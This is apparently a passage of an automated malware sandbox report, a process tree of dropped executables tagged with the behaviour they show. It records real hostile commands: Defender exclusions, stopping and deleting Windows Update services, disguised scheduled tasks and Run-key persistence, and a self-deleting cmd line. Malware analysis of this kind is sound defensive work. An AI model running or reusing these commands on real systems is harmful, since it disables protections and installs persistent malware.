      PID:2168
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.40.79317956\1880210892" -childID 37 -isForBrowser -prefsHandle 6296 -prefMapHandle 9176 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ee76734-54dc-4aae-9bd6-124174253cb3} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 6636 2113e3c0358 tab
      4⤵
      PID:1468
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.43.971772209\1186678150" -childID 40 -isForBrowser -prefsHandle 3492 -prefMapHandle 9308 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a183c1e-3668-469c-8400-fbf92a4fb54f} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 9988 21142fb2e58 tab
      4⤵
      PID:3324
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.44.1658677105\1220779808" -childID 41 -isForBrowser -prefsHandle 7636 -prefMapHandle 5432 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52ec34f0-01fc-4ba2-9d92-aaea8e0cec7e} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 4328 21143141858 tab
      4⤵
      PID:6088
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.45.1206698419\407208976" -childID 42 -isForBrowser -prefsHandle 5428 -prefMapHandle 9956 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5283a5a-6e57-4ed7-82ac-a52f615ec295} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7664 2113dce6458 tab
      4⤵
      PID:2328
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2328 -s 828
        5⤵
        Executes dropped EXE
        Program crash
        
        PID:1092
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.48.215331015\1713143187" -childID 45 -isForBrowser -prefsHandle 5428 -prefMapHandle 7212 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0847b014-e0e6-46b7-b0d9-f64963bfb9a8} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 9820 2114313e258 tab
      4⤵
      PID:6096
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.47.1779718842\1529547555" -childID 44 -isForBrowser -prefsHandle 9228 -prefMapHandle 9304 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {664cca35-d5d1-46ff-9a72-a60d9939b5e2} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7664 21142f6c558 tab
      4⤵
      PID:2244
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.46.1751187620\1761135924" -childID 43 -isForBrowser -prefsHandle 8052 -prefMapHandle 5796 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02bcfd0a-d8c4-47a4-a76e-256128209d05} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7808 21143140358 tab
      4⤵
      PID:3820
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.49.16303859\2048313896" -childID 46 -isForBrowser -prefsHandle 3604 -prefMapHandle 4924 -prefsLen 30247 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a30f33b3-dc94-4250-bddd-d31bad7763f5} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 9984 21131461358 tab
      4⤵
      PID:1624
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.52.1621545808\438914578" -childID 49 -isForBrowser -prefsHandle 6420 -prefMapHandle 9648 -prefsLen 30247 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a130ca79-e63a-47b2-9fcc-ea94a11a34c9} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 1344 2113fa2b958 tab
      4⤵
      PID:2824
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.51.2035360828\1012273314" -childID 48 -isForBrowser -prefsHandle 2468 -prefMapHandle 5440 -prefsLen 30247 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4301e695-a820-4322-a3d7-54ca5831189c} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7604 2113fa29858 tab
      4⤵
      PID:6116
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.50.1028224485\1516281874" -childID 47 -isForBrowser -prefsHandle 7900 -prefMapHandle 6468 -prefsLen 30247 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48537316-d69f-4bff-9556-4634bf3916c1} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 6456 2113fa2a758 tab
      4⤵
      PID:5276
- C:\Users\Admin\AppData\Local\Temp\80F7.exe
  C:\Users\Admin\AppData\Local\Temp\80F7.exe
  2⤵
  - Executes dropped EXE
  PID:1788
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 444
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:5556
- C:\Users\Admin\AppData\Local\Temp\8221.exe
  C:\Users\Admin\AppData\Local\Temp\8221.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5064
- - C:\Users\Admin\AppData\Local\Temp\8221.exe
    C:\Users\Admin\AppData\Local\Temp\8221.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    PID:2296
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\9eacb941-f28f-46b9-ac44-1830dd5f5713" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:3188
  - - C:\Users\Admin\AppData\Local\Temp\8221.exe
      "C:\Users\Admin\AppData\Local\Temp\8221.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:3636
    - - C:\Users\Admin\AppData\Local\Temp\8221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8221.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3944
      - C:\Users\Admin\AppData\Local\133ab028-4f54-4fa1-b321-31e9a2ed80b9\build2.exe
        
        "C:\Users\Admin\AppData\Local\133ab028-4f54-4fa1-b321-31e9a2ed80b9\build2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\133ab028-4f54-4fa1-b321-31e9a2ed80b9\build2.exe
        
        "C:\Users\Admin\AppData\Local\133ab028-4f54-4fa1-b321-31e9a2ed80b9\build2.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:5412
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\133ab028-4f54-4fa1-b321-31e9a2ed80b9\build2.exe" & exit
        8⤵
        
        PID:3328
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:1304
      - C:\Users\Admin\AppData\Local\133ab028-4f54-4fa1-b321-31e9a2ed80b9\build3.exe
        
        "C:\Users\Admin\AppData\Local\133ab028-4f54-4fa1-b321-31e9a2ed80b9\build3.exe"
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:1144
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Executes dropped EXE
        Creates scheduled task(s)
        
        PID:4708
- C:\Users\Admin\AppData\Local\Temp\9155.exe
  C:\Users\Admin\AppData\Local\Temp\9155.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3860
- - C:\Users\Admin\AppData\Local\Temp\ss31.exe
    "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
    3⤵
    - Executes dropped EXE
    PID:5140
- - C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
    "C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:5228
  - - C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
      "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:5920
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:3644
- - C:\Users\Admin\AppData\Local\Temp\XandETC.exe
    "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
    3⤵
    - Executes dropped EXE
    PID:5520
- C:\Users\Admin\AppData\Local\Temp\99F1.exe
  C:\Users\Admin\AppData\Local\Temp\99F1.exe
  2⤵
  PID:1144
- C:\Users\Admin\AppData\Local\Temp\9E76.exe
  C:\Users\Admin\AppData\Local\Temp\9E76.exe
  2⤵
  PID:4708
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 340
    3⤵
    - Program crash
    PID:5828
- C:\Users\Admin\AppData\Local\Temp\A50F.exe
  C:\Users\Admin\AppData\Local\Temp\A50F.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5472
- - C:\Users\Admin\AppData\Local\Temp\A50F.exe
    C:\Users\Admin\AppData\Local\Temp\A50F.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5200
  - - C:\Users\Admin\AppData\Local\Temp\A50F.exe
      "C:\Users\Admin\AppData\Local\Temp\A50F.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5840
    - - C:\Users\Admin\AppData\Local\Temp\A50F.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A50F.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3348
      - C:\Users\Admin\AppData\Local\9e828f2f-940f-4b43-b4c1-609587dc1983\build2.exe
        
        "C:\Users\Admin\AppData\Local\9e828f2f-940f-4b43-b4c1-609587dc1983\build2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\9e828f2f-940f-4b43-b4c1-609587dc1983\build2.exe
        
        "C:\Users\Admin\AppData\Local\9e828f2f-940f-4b43-b4c1-609587dc1983\build2.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:2964
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\9e828f2f-940f-4b43-b4c1-609587dc1983\build2.exe" & exit
        8⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:5572
      - C:\Users\Admin\AppData\Local\9e828f2f-940f-4b43-b4c1-609587dc1983\build3.exe
        
        "C:\Users\Admin\AppData\Local\9e828f2f-940f-4b43-b4c1-609587dc1983\build3.exe"
        6⤵
        Executes dropped EXE
        
        PID:4088
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:5076
- C:\Users\Admin\AppData\Local\Temp\D3D2.exe
  C:\Users\Admin\AppData\Local\Temp\D3D2.exe
  2⤵
  PID:5416
- C:\Users\Admin\AppData\Local\Temp\D9DD.exe
  C:\Users\Admin\AppData\Local\Temp\D9DD.exe
  2⤵
  PID:2964
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 340
    3⤵
    - Program crash
    PID:5256
- C:\Users\Admin\AppData\Local\Temp\CAE7.exe
  C:\Users\Admin\AppData\Local\Temp\CAE7.exe
  2⤵
  - Executes dropped EXE
  PID:5452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1044
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:4888
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4100
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4912
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5248
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1428
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5736
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4920
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:2744
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4052
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:5936
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4512
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:112
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:5268
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5556
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5416
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
    3⤵
    PID:5216
- C:\Users\Admin\AppData\Local\Temp\85CE.exe
  C:\Users\Admin\AppData\Local\Temp\85CE.exe
  2⤵
  - Executes dropped EXE
  PID:5940
- - C:\Windows\system32\dllhost.exe
    "C:\Windows\system32\dllhost.exe"
    3⤵
    - Accesses Microsoft Outlook profiles
    - Checks processor information in registry
    - outlook_office_path
    - outlook_win_path
    PID:5860
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 700
    3⤵
    - Program crash
    PID:5948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5936
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:1472
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2652
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3776
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4648
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3568
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3188
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3860
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:5420
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:5512
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:5772
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:5832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3696
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe zuhwtyqtfkk
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Program Files directory
  PID:5520
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:4480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    PID:2352
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:3276
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
  2⤵
  PID:1284
- C:\Users\Admin\AppData\Local\Temp\677E.exe
  C:\Users\Admin\AppData\Local\Temp\677E.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5860
- - C:\Users\Admin\AppData\Local\Temp\677E.exe
    C:\Users\Admin\AppData\Local\Temp\677E.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:880
  - - C:\Users\Admin\AppData\Local\Temp\677E.exe
      "C:\Users\Admin\AppData\Local\Temp\677E.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4576
    - - C:\Users\Admin\AppData\Local\Temp\677E.exe
        
        "C:\Users\Admin\AppData\Local\Temp\677E.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1076
      - C:\Users\Admin\AppData\Local\5e1c7ba1-a2d7-4659-bf17-a449be53a19b\build2.exe
        
        "C:\Users\Admin\AppData\Local\5e1c7ba1-a2d7-4659-bf17-a449be53a19b\build2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:432
        
        C:\Users\Admin\AppData\Local\5e1c7ba1-a2d7-4659-bf17-a449be53a19b\build2.exe
        
        "C:\Users\Admin\AppData\Local\5e1c7ba1-a2d7-4659-bf17-a449be53a19b\build2.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1536
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 1652
        8⤵
        Program crash
        
        PID:4948
      - C:\Users\Admin\AppData\Local\5e1c7ba1-a2d7-4659-bf17-a449be53a19b\build3.exe
        
        "C:\Users\Admin\AppData\Local\5e1c7ba1-a2d7-4659-bf17-a449be53a19b\build3.exe"
        6⤵
        Executes dropped EXE
        
        PID:5384
- C:\Users\Admin\AppData\Local\Temp\8567.exe
  C:\Users\Admin\AppData\Local\Temp\8567.exe
  2⤵
  - Executes dropped EXE
  PID:5820
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 816
    3⤵
    - Program crash
    PID:1128
- C:\Users\Admin\AppData\Local\Temp\8DA5.exe
  C:\Users\Admin\AppData\Local\Temp\8DA5.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5164
- C:\Users\Admin\AppData\Local\Temp\9651.exe
  C:\Users\Admin\AppData\Local\Temp\9651.exe
  2⤵
  - Executes dropped EXE
  PID:1988
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 340
    3⤵
    - Program crash
    PID:5460
- C:\Users\Admin\AppData\Local\Temp\3768.exe
  C:\Users\Admin\AppData\Local\Temp\3768.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:1244
- C:\Windows\SysWOW64\grpconv.exe
  C:\Windows\SysWOW64\grpconv.exe
  2⤵
  - Checks processor information in registry
  PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4708 -ip 4708
1⤵
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 816
1⤵
- Program crash
PID:5800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5452 -ip 5452
1⤵
PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2964 -ip 2964
1⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
- Executes dropped EXE
PID:5836

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
- Executes dropped EXE
PID:644
- C:\Windows\SysWOW64\schtasks.exe
  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
